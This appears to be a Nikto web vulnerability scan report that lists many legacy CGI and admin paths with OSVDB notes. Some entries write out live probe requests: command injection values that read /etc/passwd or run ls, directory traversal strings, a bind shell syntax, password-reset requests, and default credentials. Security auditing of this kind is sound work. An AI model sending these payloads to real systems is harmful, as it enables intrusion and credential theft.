+ OSVDB-21365: /cgi-915/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /htbin/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /scripts/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /cgi-exe/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /cgibin/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-exe/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-perl/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-bin-sdb/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /fcgi-bin/wwwadmin.pl: Administration CGI?
+ /cgi/webmap.cgi: nmap front end... could be fun
+ /cgi-bin/webmap.cgi: nmap front end... could be fun
+ /cgibin/webmap.cgi: nmap front end... could be fun
+ /cgis/webmap.cgi: nmap front end... could be fun
+ /fcgi-bin/webmap.cgi: nmap front end... could be fun
+ /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /webcgi/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /cgi-915/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /fcgi-bin/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /cgi/admin/setup.cgi: May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.
+ /cgibin/admin/setup.cgi: May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.
+ /cgi-win/mt-static/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /cgi-exe/mt/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /cgi/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ /htbin/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ /cgi-perl/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ OSVDB-17111: /cgi-exe/dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-17111: /cgi-915/DCShop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-17111: /cgi-bin-sdb/DCShop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /cgi-perl/dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ /cgibin/dumpenv.pl: This CGI gives a lot of information to attackers.
+ /cgi-bin-sdb/dumpenv.pl: This CGI gives a lot of information to attackers.
+ /webcgi/mkilog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /htbin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /fcgi-bin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /cgi-perl/mkilog.exe: This CGI can give an attacker a lot of information.
+ /webcgi/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /htbin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgibin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /scripts/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin-sdb/mkplog.exe: This CGI can give an attacker a lot of information.
+ /htbin/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgibin/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgis/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgi-exe/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /webcgi/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgi-915/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgi/rpm_query: This CGI allows anyone to see the installed RPMs
+ /htbin/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgis/rpm_query: This CGI allows anyone to see the installed RPMs
+ /webcgi/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /cgi/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /cgi-bin-sdb/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /scripts/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-win/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /fcgi-bin/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-perl/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
+ /cplogfile.log: XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.
+ /webcgi/view-source?view-source: This allows remote users to view source code.
+ /htbin/view-source?view-source: This allows remote users to view source code.
+ /scripts/view-source?view-source: This allows remote users to view source code.
+ /cgi-win/view-source?view-source: This allows remote users to view source code.
+ OSVDB-9332: /webcgi/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgis/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgi-perl/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgi-bin-sdb/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-4663: /cgi-bin/SGB_DIR/superguestconfig: Super GuestBook 1.0 from lasource.r2.ru stores the admin password in a plain text file.
+ /cgi-exe/icat: Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.
+ /cgi-bin-sdb/icat: Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.
+ /cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /scripts/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /fcgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /cgibin/view-source: This may allow remote arbitrary file retrieval.
+ /cgis/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-win/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-exe/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-bin-sdb/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-915/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /cgibin/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /cgis/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /fcgi-bin/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /webcgi/cgiwrap: Some versions of cgiwrap allow anyone to execute commands remotely.
+ /cgi-bin-sdb/cgiwrap: Some versions of cgiwrap allow anyone to execute commands remotely.
+ /cgi/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /htbin/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /fcgi-bin/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /cgi-exe/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ OSVDB-4571: /cgi-win/ImageFolio/admin/admin.cgi: ImageFolio (default accout Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/
+ /webcgi/info2www: This CGI allows attackers to execute commands.
+ /htbin/info2www: This CGI allows attackers to execute commands.
+ /cgi-exe/info2www: This CGI allows attackers to execute commands.
+ /cgi-perl/info2www: This CGI allows attackers to execute commands.
+ /cgi-bin-sdb/info2www: This CGI allows attackers to execute commands.
+ /cgi-bin/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgis/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgi-win/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgi-bin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /htbin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /fcgi-bin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /cgi-exe/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /htbin/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi-exe/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi-bin-sdb/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /cgi-bin/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /scripts/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /fcgi-bin/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /cgi-915/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgibin/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi-perl/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi-bin-sdb/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-win/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /fcgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-915/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /htbin/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgi-win/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /fcgi-bin/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgi-bin-sdb/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgibin/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /scripts/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /htbin/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgibin/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgis/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /scripts/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgibin/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgi-win/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgi-bin-sdb/plusmail: This CGI may allow attackers to execute commands remotely.
+ OSVDB-10944: /htbin/scripts/slxweb.dll/getfile?type=Library&file=[invalid fileNikto]: SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.
+ OSVDB-10944: /cgi-win/scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]: SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.
+ /scripts/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|: To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command
+ OSVDB-54034: /htbin/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-54034: /fcgi-bin/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-54034: /cgi-perl/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-10598: /webcgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-10598: /cgi-perl/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-10598: /cgi-bin-sdb/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-13981: /cgibin/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-13981: /cgis/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-13981: /cgi-perl/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-4854: /webcgi/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /cgi-bin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /cgibin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /scripts/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /fcgi-bin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-2088: /cgi-915/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /cgi-bin/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /cgis/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /scripts/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-236: /cgi-915/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgi/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /htbin/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgis/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgi-win/webgais: The webgais allows attackers to execute commands.
+ OSVDB-237: /cgi/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ OSVDB-237: /htbin/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ OSVDB-237: /cgi-win/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ /webcgi/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-bin/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-win/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /fcgi-bin/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-perl/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi/common/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /cgi-win/common/listrec.pl: This CGI allows attackers to execute commands on the host.
+ OSVDB-59031: /webcgi/stat.pl: Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER.
+ OSVDB-28: /cgi-915/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgi-bin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgibin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /scripts/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /fcgi-bin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgi-bin-sdb/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-142: /webcgi/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /htbin/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /cgis/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /scripts/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ /cgi-bin/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ /scripts/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ /fcgi-bin/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ /admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ /cgibin/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-exe/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-perl/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-win/c32web.exe/ChangeAdminPassword: This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.
+ /cgi/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgi-bin/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /htbin/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgis/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgi-exe/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /fcgi-bin/log/nether-log.pl?checkit: Default Pass: nethernet-rules
+ /webcgi/mini_logger.cgi: Default password: guest
+ /cgi-915/mini_logger.cgi: Default password: guest
+ /scripts/mini_logger.cgi: Default password: guest
+ /fcgi-bin/mini_logger.cgi: Default password: guest
+ /cgi-bin-sdb/mini_logger.cgi: Default password: guest
+ /cgi-bin/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /cgis/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /cgi-exe/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /scripts/robadmin.cgi: Default password: roblog
+ /cgi-exe/robadmin.cgi: Default password: roblog
+ /htbin/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /scripts/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /cgi-exe/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /cgi/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites. It should be investigated further.
+ /cgis/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites. It should be investigated further.
+ /cgi-bin-sdb/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites. It should be investigated further.
+ /cgi-bin/unlg1.1: web backdoor by ULG
+ /cgis/unlg1.1: web backdoor by ULG
+ /cgi-win/unlg1.1: web backdoor by ULG
+ /cgi-perl/unlg1.1: web backdoor by ULG
+ /webcgi/unlg1.2: web backdoor by ULG
+ /cgi-915/unlg1.2: web backdoor by ULG
+ /cgis/unlg1.2: web backdoor by ULG
+ /cgi-exe/unlg1.2: web backdoor by ULG
+ /cgi-bin-sdb/unlg1.2: web backdoor by ULG
+ /cgi/rwwwshell.pl: THC reverse www shell
+ /cgi-bin/rwwwshell.pl: THC reverse www shell
+ /cgis/rwwwshell.pl: THC reverse www shell
+ /cgi-win/rwwwshell.pl: THC reverse www shell
+ /webcgi/photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ /cgibin/photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ OSVDB-35876: /agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
+ /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
+ /ip.txt: This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.
+ OSVDB-59536: /logicworks.ini: web-erp 0.1.4 and earlier allow .ini files to be read remotely.
+ OSVDB-2881: /pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
+ /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
+ OSVDB-113: /ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
+ /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
+ OSVDB-3092: /shopadmin.asp: VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.
+ OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
+ OSVDB-568: /blahb.ida: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. http://www.microsoft.com/technet/security/bulletin/MS01-033.asp.
+ OSVDB-578: /level/24/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/38/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/63/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/71/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-13405: /WS_FTP.LOG: WS_FTP.LOG file was found. It may contain sensitive information.
+ OSVDB-3093: /cgi-915/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi-win/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcgi/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi-bin/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-1642: /cgi-win/gbook/gbook.cgi?_MAILTO=xx;ls: gbook.cgi allows command execution.
+ OSVDB-7161: /scripts/bslist.cgi?email=x;ls: BSList allows command execution.
+ OSVDB-7161: /cgi-perl/bslist.cgi?email=x;ls: BSList allows command execution.
+ OSVDB-7162: /webcgi/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi-915/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi-bin-sdb/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-136: /cgi/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-win/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /fcgi-bin/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-perl/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-bin-sdb/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-228: /cgi/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-bin/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-win/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /fcgi-bin/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-exe/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-perl/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access to allowed sources.
+ OSVDB-127: /cgi/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-127: /cgis/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-127: /scripts/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-128: /cgibin/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-128: /cgi-win/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-128: /cgi-bin-sdb/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-2: /iissamples/exair/search/search.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-2717: /cgi-bin/include/new-visitor.inc.php: Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.
+ OSVDB-2717: /cgi-perl/include/new-visitor.inc.php: Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.
+ OSVDB-2735: /cgi-bin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /cgibin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
